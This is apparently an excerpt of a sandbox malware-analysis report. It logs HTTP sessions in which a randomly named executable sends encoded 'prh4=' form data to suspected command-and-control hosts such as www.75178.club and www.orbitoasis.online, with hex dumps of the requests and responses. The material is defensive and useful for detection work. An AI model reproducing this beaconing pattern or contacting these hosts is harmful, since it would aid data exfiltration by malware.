                                                                      Data Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 31 4f 4a 46 43 6f 75 4b 4e 75 70 78 6d 73 35 4b 6c 73 31 70 61 63 71 47 30 74 71
                                                                      Data Ascii: prh4=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa1OJFCouKNupxms5Kls1pacqG0tq


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.104997723.167.152.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:15.314382076 CET765OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 52 57 37 52 55 54 42 2f 4d 4c 6b 57 53 51 79 5a 70 49 59 7a 4e 4d 65 63 70 57 46 36 36 33 6e 2b 75 34 41 4d 54 64 50 4d 62 64 4b 58 42 59 42 69 6a 58 38 59 37 6f 72 36 67 6b 32 31 4b 45 6c 66 39 50 4c 66 54 45 49 30 76 56 2b 6f 74 79 73 68 42 48 36 2f 35 36 49 34 4c 33 4a 38 36 6f 30 6e 38 78 57 72 50 30 65 66 7a 54 79 64 6b 49 43 71 68 59 74 56 35 6a 51 31 43 5a 42 6b 73 52 62 74 4f 51 37 6e 52 2b 62 30 4e 69 36 74 41 6b 49 79 59 41 74 73 5a 44 47 69 45 77 2f 4b 65 49 5a 6d 37 77 49 53 37 31 6c 67 3d 3d
                                                                      Data Ascii: prh4=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEURW7RUTB/MLkWSQyZpIYzNMecpWF663n+u4AMTdPMbdKXBYBijX8Y7or6gk21KElf9PLfTEI0vV+otyshBH6/56I4L3J86o0n8xWrP0efzTydkICqhYtV5jQ1CZBksRbtOQ7nR+b0Ni6tAkIyYAtsZDGiEw/KeIZm7wIS71lg==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.104997823.167.152.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:17.856843948 CET1778OUTPOST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 70 57 37 47 38 54 42 59 59 4c 72 32 53 51 2f 35 70 4e 59 7a 4e 64 65 63 68 53 46 36 33 43 6e 38 47 34 53 61 48 64 59 50 44 64 41 58 42 59 65 79 6a 57 32 34 36 79 72 36 77 67 32 31 61 45 6c 66 39 50 4c 63 4c 45 4d 67 37 56 38 6f 74 7a 37 52 42 4c 74 76 34 58 49 2b 6a 34 4a 38 2b 34 31 57 41 78 57 4c 66 30 5a 74 72 54 30 4e 6c 75 50 4b 68 41 74 56 31 38 51 30 75 76 42 6b 77 37 62 75 65 51 32 57 38 65 45 77 46 70 68 64 4d 6e 4f 52 55 36 6d 73 5a 6b 4b 6e 56 47 30 6f 71 2f 45 45 53 38 64 44 65 77 39 55 66 36 50 55 50 2b 42 33 6f 6f 64 4a 4f 39 50 39 6f 44 4c 55 74 72 70 49 6b 6b 44 79 67 2b 39 4b 4f 50 65 6d 38 55 54 4a 5a 62 78 53 4a 36 57 70 31 54 39 4a 58 5a 47 42 71 46 78 4f 77 48 51 63 4b 58 47 72 6a 68 52 31 68 79 4a 50 64 46 68 33 78 4d 59 64 49 73 6b 36 75 31 5a 6e 44 54 79 45 39 2f 4d 63 64 32 4d 71 4e 37 54 48 79 61 7a 4f 46 51 62 69 69 4b 72 73 6c 4b 35 [TRUNCATED]
                                                                      Data Ascii: prh4=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEUpW7G8TBYYLr2SQ/5pNYzNdechSF63Cn8G4SaHdYPDdAXBYeyjW246yr6wg21aElf9PLcLEMg7V8otz7RBLtv4XI+j4J8+41WAxWLf0ZtrT0NluPKhAtV18Q0uvBkw7bueQ2W8eEwFphdMnORU6msZkKnVG0oq/EES8dDew9Uf6PUP+B3oodJO9P9oDLUtrpIkkDyg+9KOPem8UTJZbxSJ6Wp1T9JXZGBqFxOwHQcKXGrjhR1hyJPdFh3xMYdIsk6u1ZnDTyE9/Mcd2MqN7THyazOFQbiiKrslK5rYRddWjEuuBL9TjwZsJXQCbZGtfhV5xUm+JV3s2QndHIA17NhOk0VB2JWRKThRI3d4RQO9F8X7RJBE7yM6zULNHXlfNLdlRiyGq7pjw/e/tjtCPCbWWLUogkH8ot0nAa+dKvzIcmx+VmOP7I93+TXlyDlgEcHJjMOpaCs3lQOcOzwSHhcYj4cCYwyQIsA/rc9KBv6WW92ZWNjpzJWh1s/JOpThyHm+SvbWTs6CeGCNKPDPP0LsOHHaL44BEJbEfVZs2OOycv8VqUNdnvk4agxGV3e+ONVNX+/5bgyJmPNiMoRrkUTruT/DLKFKTQvQkBubU9VT4rF9cX5fntEN4aSKWjAN0cY0kKhAUiMUoWrnWNaEH5HMabs1Ka8bTYct2sQxIjoqnZz3kO4BtJ4i8EbbSEczpHAKtgxPaR5n0JLcNPNfLrLJhh+0hUqLerYlSr5+KrWJyISJveUwu9KqqJBYvFBdkNC8tc5rsDAimug5xj6bZCOLbh4HPDvuikaF1vCpEdVj5iN2uIMtMMiVFEr2bRlJv7LCSrahD8IYLaAg2IEBvTDNR1ny8PrbXaElk1E2EGb2VHtYQ17mJBn4Vf6I+2C6DwP8p3esf10AQfSVV0EjzrlvwsenxM25rozsMDfipPnOOIs7dBiL8WNJolWZkgmqQl8kG/d9 [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.104997923.167.152.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:20.397167921 CET491OUTGET /a4h7/?prh4=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIltxcg2u/Ln1i4sz2BSy8/lHA9faVw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.104998166.29.132.194806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:25.835645914 CET762OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 39 41 69 43 30 68 67 4c 2b 65 36 51 4d 67 71 55 71 4c 76 33 34 63 71 73 4e 61 68 52
                                                                      Data Ascii: prh4=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX9AiC0hgL+e6QMgqUqLv34cqsNahR
                                                                      Nov 20, 2024 09:23:26.444169998 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:26 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd [TRUNCATED]
                                                                      Data Ascii: 1359ZrHr?OAa{7j$A$@$Hn85d.PRbKpD#++]2kCA~{|31pMo[`F:l,N{7*_v`[=wO}J__d4O*'?p%;OwMyVTW'mB||iXf|_f>_*v1j0y;EYVr{]/|24ej7H30>=le qVm~fZnzqYJ8L_QevxwiaSc8a?n]~gt*/Y7p2M +`=L ]Hf/;E5vy}zA_\Whqo_P!.\c=$?Sg\_kw7Bkt7r=W3_w&8EPM/mI7d#8''@[YUe$zu;fp)n;J#<YWzuLsk9L`bsb|0|^%OAVWeB~Wnwx]7lyqWp>Pnn6F.|XoPG+Sr>2hF"?f'KA{dK71>j#W{}>Lnn!AOh^:?8W
                                                                      Nov 20, 2024 09:23:26.444343090 CET224INData Raw: 73 c6 a7 04 4a e0 6f 6a 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 70 a4 2f 8a 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 85 97 67 e5 25 42 3d 0c 0a 37 06 be ae b9 31 c0 7e 4e ef b1 80 fd b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7c ba 20 fb d9 ae df cf 7b 63
                                                                      Data Ascii: sJojxoOp/6g%B=71~N t7}cU| {c_qQ*~7/KQOEJ{_+-5j_. _W*C@HCY~U!3gHbO5*z~qV
                                                                      Nov 20, 2024 09:23:26.444375038 CET1236INData Raw: 75 f5 81 71 bd 5c c6 af fc 47 bf b2 6f af d7 9b 0f 86 5e 8f 84 dc dc d3 fb 65 37 c2 79 b9 70 3f 6b ff 03 00 dd c4 eb cf 14 ff 46 f5 03 e7 33 99 00 d1 fe 2f 9c cf 8f 6e a3 2e e2 3f 39 66 65 3e 5c dc 08 9c a7 fe 5f 2c b3 74 47 c4 97 70 43 2f b5 16
                                                                      Data Ascii: uq\Go^e7yp?kF3/n.?9fe>\_,tGpC/~F&}K?#CI/St{*6!?co5CuZ@.*P:}[dlR($};Lk! }q%fN~6_eAjxYPwgRgqSj|Ij3Hy
                                                                      Nov 20, 2024 09:23:26.444842100 CET1236INData Raw: 0d ae ad 8f 43 82 0a 14 b7 c3 65 53 54 17 ad 20 8a 6a ac 46 8a d5 96 da 34 77 12 c7 82 03 96 5c af 58 a6 5d d3 35 b9 c5 91 72 25 86 ab 31 40 4c bb 1f 33 3e e5 b2 87 d8 94 26 51 45 b1 08 24 75 2d 48 4e 93 bb 72 6d 4a 99 26 66 8c b9 4f 7c 9c 56 fd
                                                                      Data Ascii: CeST jF4w\X]5r%1@L3>&QE$u-HNrmJ&fO|V6]`A1U<5gO;"J><C&'6pAn%*h*!!.c@CYjH%:^,RZ3W-z\A=H6*A2Bu_YJp;mVXr$5Tu,b}
                                                                      Nov 20, 2024 09:23:26.444876909 CET1236INData Raw: 28 6c 78 b1 9d 55 8b d3 b8 96 47 8a 0b b7 54 5a d0 dd 32 a5 cc 93 b8 5a 6c 23 95 6c 33 7a 7e d2 20 c8 d1 d7 65 cd cd a1 05 99 63 34 4b 78 bc 53 7a c7 a0 e3 d5 b5 ba 8f 6b 41 5f ec 0a ad 04 97 2b 9a 43 96 fe 59 8c 0b 53 23 9b a8 1d 1d d3 5d 52 b3
                                                                      Data Ascii: (lxUGTZ2Zl#l3z~ ec4KxSzkA_+CYS#]R)+ ;$3Z3q-4j<ybh("0=ai-C]":dnYvMmn5f<oW7A '@ZU"kIQXV;;,K|,wC
                                                                      Nov 20, 2024 09:23:26.444910049 CET62INData Raw: cc f7 fa e2 7f ff 17 70 45 e8 68 70 4d ed 03 95 3d ab cd bc 51 c8 7b 7c 3d c2 d7 5a 7b 84 9f e3 d7 e3 e5 99 dc b7 df fe 07 00 00 ff ff 03 00 24 f7 ec 9b 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: pEhpM=Q{|=Z{$'0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.104998266.29.132.194806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:28.387253046 CET786OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 32 69 44 63 55 37 4c 79 42 68 6f 4e 4e 44 6f 4e 2b 4f 34 50 4c 73 69 61 42 2f 48 51 3d 3d
                                                                      Data Ascii: prh4=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrr2iDcU7LyBhoNNDoN+O4PLsiaB/HQ==
                                                                      Nov 20, 2024 09:23:28.977950096 CET1236INHTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 20 Nov 2024 08:23:28 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
                                                                      Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd [TRUNCATED]
                                                                      Data Ascii: 134FZrHr?OAa{7j$A$@$Hn85d.PRbKpD#++]2kCA~{|31pMo[`F:l,N{7*_v`[=wO}J__d4O*'?p%;OwMyVTW'mB||iXf|_f>_*v1j0y;EYVr{]/|24ej7H30>=le qVm~fZnzqYJ8L_QevxwiaSc8a?n]~gt*/Y7p2M +`=L ]Hf/;E5vy}zA_\Whqo_P!.\c=$?Sg\_kw7Bkt7r=W3_w&8EPM/mI7d#8''@[YUe$zu;fp)n;J#<YWzuLsk9L`bsb|0|^%OAVWeB~Wnwx]7lyqWp>Pnn6F.|XoPG+Sr>2hF"?f'KA{dK71>j#W{}>Lnn!AOh^:?8W
                                                                      Nov 20, 2024 09:23:28.977981091 CET1236INData Raw: 73 c6 a7 04 4a e0 6f 6a 78 e3 e7 6f 89 eb 84 e6 e0 4f 09 70 a4 2f 8a 19 8f c8 bc fb f3 cd 36 b7 a8 bd 19 ee 85 97 67 e5 25 42 3d 0c 0a 37 06 be ae b9 31 c0 7e 4e ef b1 80 fd b4 0f 83 20 74 1c 37 7d 63 a9 1f ed db 55 7c ba 20 fb d9 ae df cf 7b 63
                                                                      Data Ascii: sJojxoOp/6g%B=71~N t7}cU| {c_qQ*~7/KQOEJ{_+-5j_. _W*C@HCY~U!3gHbO5*z~qVuq\Go^
                                                                      Nov 20, 2024 09:23:28.977999926 CET448INData Raw: 3d 13 70 bb 70 59 e2 93 05 2c 1a 6d b8 ec 34 c1 77 b9 b9 9d 58 92 38 b1 6d 41 63 9c 4e 77 0d 33 9d e6 ea 4c a2 75 56 9c 76 2d 6a 07 b3 90 a6 b2 24 3a e3 1d 81 c7 50 5a 6f f9 64 1b 44 6a 89 98 23 63 6c 08 1b 77 3c c6 12 b4 da c7 3a cd 05 73 71 12
                                                                      Data Ascii: =ppY,m4wX8mAcNw3LuVv-j$:PZodDj#clw<:sqzyYq'~u*8tLej-%Pr?Zs-}\q]lZ|t: GfRj#Up,)jf(6r/bRwjE8D^x)psBZ^D^nCeST j
                                                                      Nov 20, 2024 09:23:28.978677988 CET1236INData Raw: d6 72 ec 91 d9 86 b3 e6 24 35 1c 8e 54 75 8e 2c e4 62 7d c0 aa 70 eb d9 d3 34 40 02 45 cc 0d 6e c3 1f 12 9a 72 31 6b 32 d4 f1 56 ea c2 2c e4 0a 2d c1 d2 3a 70 48 55 63 28 52 6c d7 1a b5 45 97 63 85 2a ad 8a 51 4e 92 e4 cf 72 08 85 45 b3 3b f2 94
                                                                      Data Ascii: r$5Tu,b}p4@Enr1k2V,-:pHUc(RlEc*QNrE;v.$5QL1rMRNs^-/zxYL9JoZ9]e9:h+8x2sl(dl@V4bLNs_G*.]MyvV1e!9k/M
                                                                      Nov 20, 2024 09:23:28.978702068 CET1079INData Raw: 0e a0 e8 87 4b d6 f0 84 ca a2 7c 84 2c 77 0f 02 a6 43 12 a3 e1 b8 55 0c 4f 26 f3 3d 6d 23 3e 34 9b 87 73 23 94 8b 49 41 34 e8 be 68 1c ab 32 cf 39 3a 5a af 98 a5 b7 cf 73 29 e4 d9 51 b8 39 16 d8 18 cd 36 59 a4 8f a8 d9 44 1f 4e f9 74 27 b6 ed 30
                                                                      Data Ascii: K|,wCUO&=m#>4s#IA4h29:Zs)Q96YDNt'0h1}`\0MXMYR# Du!NxMf#\sJa$>Y9kKEEd^GChj8bJtsvj=!a~o:MN1`B5=ez(D3qP6


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.104998366.29.132.194806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:30.933165073 CET1799OUTPOST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 65 7a 77 4a 6b 2b 50 73 72 4f 58 2b 35 79 74 4e 64 6b 44 46 45 67 47 67 4f 52 41 73 49 2b 77 6b 4c 6a 6e 68 2b 4d 59 66 67 2f 44 47 33 51 68 77 59 68 6f 7a 4f 67 6a 59 6a 75 50 71 56 76 75 69 35 74 7a 4e 34 65 42 4b 33 34 6c 47 32 5a 35 38 55 35 33 53 76 49 35 4c 48 70 53 48 7a 58 4d 73 4c 6d 68 62 47 7a 5a 2b 63 30 74 6f 47 2b 46 52 37 6a 67 52 46 6a 34 52 59 58 75 37 51 33 55 51 33 34 4d 37 70 4e 6d 46 74 6a 41 72 57 67 51 35 44 36 34 57 53 4e 52 43 48 53 73 4b 62 4c 37 79 52 61 35 52 [TRUNCATED]
